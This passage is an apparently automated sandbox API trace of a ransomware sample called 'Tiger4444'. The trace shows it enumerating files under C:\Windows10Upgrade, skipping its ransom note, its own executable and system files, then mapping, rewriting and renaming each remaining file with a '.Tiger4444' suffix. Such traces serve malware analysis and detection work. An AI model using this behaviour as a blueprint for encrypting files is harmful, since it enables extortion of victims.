| out: lpFileSize=0x30abf88*=577) returned 1 [0040.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0040.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0040.281] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x2cc [0040.283] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0xc20000 [0040.284] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0040.284] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0040.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0040.284] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0040.284] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0040.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0040.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0040.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0040.285] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13173790604) returned 1 [0040.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0040.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0040.285] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0040.285] CloseHandle (hObject=0x2cc) returned 1 [0040.285] CloseHandle (hObject=0x2c8) returned 1 [0040.287] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\PostOOBEScript.cmd.Tiger4444") returned 48 [0040.287] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd" (normalized: "c:\\windows10upgrade\\postoobescript.cmd"), lpNewFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd.Tiger4444" (normalized: "c:\\windows10upgrade\\postoobescript.cmd.tiger4444"), dwFlags=0x1) returned 1 [0040.287] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=592 | out: Addend=0xc6f980) returned 1484112 [0040.287] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 1554 [0040.287] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b3c1b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea3b3c1b, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="resources", cAlternateFileName="RESOUR~1")) returned 1 [0040.287] lstrcmpiW (lpString1="resources", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0040.287] lstrcmpiW (lpString1="resources", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0040.287] lstrcmpiW (lpString1="resources", lpString2="Tiger4444.exe") returned -1 [0040.287] lstrcmpiW (lpString1="resources", lpString2=".") returned 1 [0040.287] lstrcmpiW (lpString1="resources", lpString2="..") returned 1 [0040.287] lstrcmpiW (lpString1="resources", lpString2="windows") returned -1 [0040.287] lstrcmpiW (lpString1="resources", lpString2="bootmgr") returned 1 [0040.288] lstrcmpiW (lpString1="resources", lpString2="pagefile.sys") returned 1 [0040.288] lstrcmpiW (lpString1="resources", lpString2="boot") returned 1 [0040.288] lstrcmpiW (lpString1="resources", lpString2="ids.txt") returned 1 [0040.288] lstrcmpiW (lpString1="resources", lpString2="NTUSER.DAT") returned 1 [0040.288] lstrcpyW (in: lpString1=0x30aead0, lpString2="resources" | out: lpString1="resources") returned="resources" [0040.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0040.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3c) returned 0xc829b8 [0040.288] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66628 | out: ListHead=0xc66828, ListEntry=0xc66628) returned 0xc66308 [0040.288] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea9ef415, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea9ef415, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x624407ed, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0x3d14a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrader_default.log", cAlternateFileName="UPGRAD~1.LOG")) returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="Tiger4444.exe") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2=".") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="..") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="windows") returned -1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="bootmgr") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="pagefile.sys") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="boot") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="ids.txt") returned 1 [0040.288] lstrcmpiW (lpString1="upgrader_default.log", lpString2="NTUSER.DAT") returned 1 [0040.288] lstrcpyW (in: lpString1=0x30aead0, lpString2="upgrader_default.log" | out: lpString1="upgrader_default.log") returned="upgrader_default.log" [0040.288] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\upgrader_default.log", dwFileAttributes=0x0) returned 1 [0040.290] lstrlenW (lpString="upgrader_default.log") returned 20 [0040.290] lstrlenW (lpString="Tiger4444") returned 9 [0040.290] lstrcmpiW (lpString1="fault.log", lpString2="Tiger4444") returned -1 [0040.290] lstrlenW (lpString=".dll") returned 4 [0040.290] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0040.290] lstrlenW (lpString=".lnk") returned 4 [0040.290] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0040.290] lstrlenW (lpString=".ini") returned 4 [0040.290] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0040.290] lstrlenW (lpString=".sys") returned 4 [0040.290] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0040.290] CreateFileW (lpFileName="C:\\Windows10Upgrade\\upgrader_default.log" (normalized: "c:\\windows10upgrade\\upgrader_default.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0040.290] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0040.290] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13174348815) returned 1 [0040.290] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=250186) returned 1 [0040.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0040.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0040.291] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d450, lpName=0x0) returned 0x2cc [0040.292] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d450) returned 0x33b0000 [0040.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0040.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0040.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0040.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0040.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0040.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0040.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0040.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0040.313] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13176620679) returned 1 [0040.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0040.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0040.313] UnmapViewOfFile (lpBaseAddress=0x33b0000) returned 1 [0040.315] CloseHandle (hObject=0x2cc) returned 1 [0040.315] CloseHandle (hObject=0x2c8) returned 1 [0040.320] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\upgrader_default.log.Tiger4444") returned 50 [0040.320] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\upgrader_default.log" (normalized: "c:\\windows10upgrade\\upgrader_default.log"), lpNewFileName="C:\\Windows10Upgrade\\upgrader_default.log.Tiger4444" (normalized: "c:\\windows10upgrade\\upgrader_default.log.tiger4444"), dwFlags=0x1) returned 1 [0040.320] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=250192 | out: Addend=0xc6f980) returned 1484704 [0040.321] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=22 | out: Addend=0xc6f98c) returned 1557 [0040.321] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccdc86a8, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x32fe02cc, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x5044, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrader_win10.log", cAlternateFileName="UPGRAD~2.LOG")) returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="Tiger4444.exe") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2=".") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="..") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="windows") returned -1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="bootmgr") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="pagefile.sys") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="boot") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="ids.txt") returned 1 [0040.321] lstrcmpiW (lpString1="upgrader_win10.log", lpString2="NTUSER.DAT") returned 1 [0040.321] lstrcpyW (in: lpString1=0x30aead0, lpString2="upgrader_win10.log" | out: lpString1="upgrader_win10.log") returned="upgrader_win10.log" [0040.321] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\upgrader_win10.log", dwFileAttributes=0x0) returned 1 [0040.321] lstrlenW (lpString="upgrader_win10.log") returned 18 [0040.322] lstrlenW (lpString="Tiger4444") returned 9 [0040.322] lstrcmpiW (lpString1="win10.log", lpString2="Tiger4444") returned 1 [0040.322] lstrlenW (lpString=".dll") returned 4 [0040.322] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0040.322] lstrlenW (lpString=".lnk") returned 4 [0040.322] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0040.322] lstrlenW (lpString=".ini") returned 4 [0040.322] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0040.322] lstrlenW (lpString=".sys") returned 4 [0040.322] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0040.322] CreateFileW (lpFileName="C:\\Windows10Upgrade\\upgrader_win10.log" (normalized: "c:\\windows10upgrade\\upgrader_win10.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0040.322] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0040.322] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13177504750) returned 1 [0040.322] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=20548) returned 1 [0040.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0040.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0040.322] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5350, lpName=0x0) returned 0x2cc [0040.324] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5350) returned 0xc20000 [0040.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0040.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0040.342] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0040.342] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0040.342] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0040.342] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0040.342] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0040.342] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0040.342] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13179499224) returned 1 [0040.342] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0040.342] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0040.342] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0040.342] CloseHandle (hObject=0x2cc) returned 1 [0040.342] CloseHandle (hObject=0x2c8) returned 1 [0040.344] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\upgrader_win10.log.Tiger4444") returned 48 [0040.344] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\upgrader_win10.log" (normalized: "c:\\windows10upgrade\\upgrader_win10.log"), lpNewFileName="C:\\Windows10Upgrade\\upgrader_win10.log.Tiger4444" (normalized: "c:\\windows10upgrade\\upgrader_win10.log.tiger4444"), dwFlags=0x1) returned 1 [0040.344] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=20560 | out: Addend=0xc6f980) returned 1734896 [0040.344] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=19 | out: Addend=0xc6f98c) returned 1579 [0040.344] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea63f06a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63f06a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x880c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wimgapi.dll", cAlternateFileName="")) returned 1 [0040.344] lstrcmpiW (lpString1="wimgapi.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0040.344] lstrcmpiW (lpString1="wimgapi.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0040.344] lstrcmpiW (lpString1="wimgapi.dll", lpString2="Tiger4444.exe") returned 1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2=".") returned 1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2="..") returned 1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2="windows") returned -1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2="bootmgr") returned 1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2="pagefile.sys") returned 1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2="boot") returned 1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2="ids.txt") returned 1 [0040.345] lstrcmpiW (lpString1="wimgapi.dll", lpString2="NTUSER.DAT") returned 1 [0040.345] lstrcpyW (in: lpString1=0x30aead0, lpString2="wimgapi.dll" | out: lpString1="wimgapi.dll") returned="wimgapi.dll" [0040.345] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\wimgapi.dll", dwFileAttributes=0x0) returned 1 [0040.356] lstrlenW (lpString="wimgapi.dll") returned 11 [0040.356] lstrlenW (lpString="Tiger4444") returned 9 [0040.356] lstrcmpiW (lpString1="mgapi.dll", lpString2="Tiger4444") returned -1 [0040.356] lstrlenW (lpString=".dll") returned 4 [0040.356] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0040.356] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea642af3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea642af3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xdf8c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="windlp.dll", cAlternateFileName="")) returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="Tiger4444.exe") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2=".") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="..") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="windows") returned -1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="bootmgr") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="pagefile.sys") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="boot") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="ids.txt") returned 1 [0040.356] lstrcmpiW (lpString1="windlp.dll", lpString2="NTUSER.DAT") returned 1 [0040.356] lstrcpyW (in: lpString1=0x30aead0, lpString2="windlp.dll" | out: lpString1="windlp.dll") returned="windlp.dll" [0040.356] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\windlp.dll", dwFileAttributes=0x0) returned 1 [0040.357] lstrlenW (lpString="windlp.dll") returned 10 [0040.357] lstrlenW (lpString="Tiger4444") returned 9 [0040.357] lstrcmpiW (lpString1="indlp.dll", lpString2="Tiger4444") returned -1 [0040.357] lstrlenW (lpString=".dll") returned 4 [0040.357] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0040.357] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea64a022, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea64a022, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x159ac8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10UpgraderApp.exe", cAlternateFileName="WINDOW~1.EXE")) returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="Tiger4444.exe") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2=".") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="..") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="windows") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="bootmgr") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="pagefile.sys") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="boot") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="ids.txt") returned 1 [0040.357] lstrcmpiW (lpString1="Windows10UpgraderApp.exe", lpString2="NTUSER.DAT") returned 1 [0040.357] lstrcpyW (in: lpString1=0x30aead0, lpString2="Windows10UpgraderApp.exe" | out: lpString1="Windows10UpgraderApp.exe") returned="Windows10UpgraderApp.exe" [0040.357] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe", dwFileAttributes=0x0) returned 1 [0040.399] lstrlenW (lpString="Windows10UpgraderApp.exe") returned 24 [0040.399] lstrlenW (lpString="Tiger4444") returned 9 [0040.400] lstrcmpiW (lpString1="erApp.exe", lpString2="Tiger4444") returned -1 [0040.400] lstrlenW (lpString=".dll") returned 4 [0040.400] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0040.400] lstrlenW (lpString=".lnk") returned 4 [0040.400] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0040.400] lstrlenW (lpString=".ini") returned 4 [0040.400] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0040.400] lstrlenW (lpString=".sys") returned 4 [0040.400] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0040.400] CreateFileW (lpFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe" (normalized: "c:\\windows10upgrade\\windows10upgraderapp.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0040.400] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0040.400] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13185299445) returned 1 [0040.400] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1415880) returned 1 [0040.400] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0040.400] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0040.400] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x159dd0, lpName=0x0) returned 0x2cc [0040.401] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x159dd0) returned 0x33b0000 [0040.907] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0040.907] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0040.907] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0040.907] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0040.907] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0040.907] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0040.907] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0040.907] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0040.907] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13236057348) returned 1 [0040.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0040.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0040.908] UnmapViewOfFile (lpBaseAddress=0x33b0000) returned 1 [0041.038] CloseHandle (hObject=0x2cc) returned 1 [0041.038] CloseHandle (hObject=0x2c8) returned 1 [0041.123] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe.Tiger4444") returned 54 [0041.123] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe" (normalized: "c:\\windows10upgrade\\windows10upgraderapp.exe"), lpNewFileName="C:\\Windows10Upgrade\\Windows10UpgraderApp.exe.Tiger4444" (normalized: "c:\\windows10upgrade\\windows10upgraderapp.exe.tiger4444"), dwFlags=0x1) returned 1 [0041.124] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=1415888 | out: Addend=0xc6f980) returned 1755456 [0041.124] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=507 | out: Addend=0xc6f98c) returned 1598 [0041.124] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea64ee41, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea64ee41, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x62c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinREBootApp32.exe", cAlternateFileName="WINREB~1.EXE")) returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="Tiger4444.exe") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2=".") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="..") returned 1 [0041.124] lstrcmpiW 